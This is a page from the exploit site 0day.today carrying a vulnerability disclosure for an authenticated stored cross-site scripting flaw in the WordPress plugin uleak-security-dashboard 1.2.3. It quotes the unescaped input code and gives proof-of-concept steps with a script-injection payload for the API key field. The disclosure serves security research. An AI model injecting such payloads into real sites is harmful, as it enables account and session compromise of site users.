0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress Uleak Security Dashboard 1.2.3 Cross Site Scripting Vulnerability
# Exploit Title: WordPress Plugin uleak-security-dashboard 1.2.3 - Stored Cross-Site Scripting (Authenticated) # Date: 31-03-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/uleak-security-dashboard/ <https://wordpress.org/plugins/amministrazione-aperta/> # Version: 1.2.3 # Tested on: Firefox # Contact me: h [at] spidersilk.com # Vulnerable Code: ``` <th scope="row"><label>ULeak API Key*: </label></th> <td><input type="text" name="ul_apikey" placeholder="XXXXXXXXXXX" value="'.$user['apikey'].'"><span class="description">(Insert your ULeak API Key. Find your Credentials in your profil settings <a target="_blank" href="https://uleak.de/profil">here</a>)</span></td> ``` # POC 1) Install uleak-security-dashboard WordPress Plugin 2) Naviagete to http://localhost/wp-admin/tools.php?page=uleak 3) Inject payload ```"><script>alert(1)</script>``` in *ULeak API Key*: *filed. 4) XSS will trigger. # POC Image https://prnt.sc/D7sq6IlNtNaf # 0day.today [2024-11-16] #